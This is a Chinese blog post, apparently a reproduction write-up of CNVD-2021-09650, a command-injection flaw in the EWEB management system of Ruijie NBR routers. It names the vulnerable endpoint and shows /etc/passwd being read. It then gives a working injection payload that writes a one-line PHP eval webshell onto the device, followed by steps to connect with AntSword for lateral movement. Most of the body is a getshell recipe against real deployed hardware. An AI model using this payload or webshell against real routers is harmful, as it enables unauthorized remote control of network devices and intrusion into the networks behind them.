锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞编号:
CNVD-2021-09650

漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取

漏洞影响:
锐捷NBR路由器 EWEB网关系统

漏洞复现:
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
首先打开网关系统
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开h锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

接着我们访问url/test.txt 路径,查看文件。

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

回显了/etc/passwd路径下passwd文件的内容

利用漏洞文件文件上传。
利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.

漏洞复现:

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

Payload :
mac=1&ip=127.0.0.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > sorry.php

将这句话execute一下。

然后我们直接上蚁剑连接就ok了
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

这边直接能看到我们上传的webshell
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

右击终端
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
然后就可以进一步的横向或者纵向,也可以进一步信息收集。

博客来之不易,还望各位大佬点赞关注,谢谢!
想找安全岗位私信内推哦!

版权声明:玥玥 发表于 2021-08-05 13:29:56。
转载请注明:锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell | 女黑客导航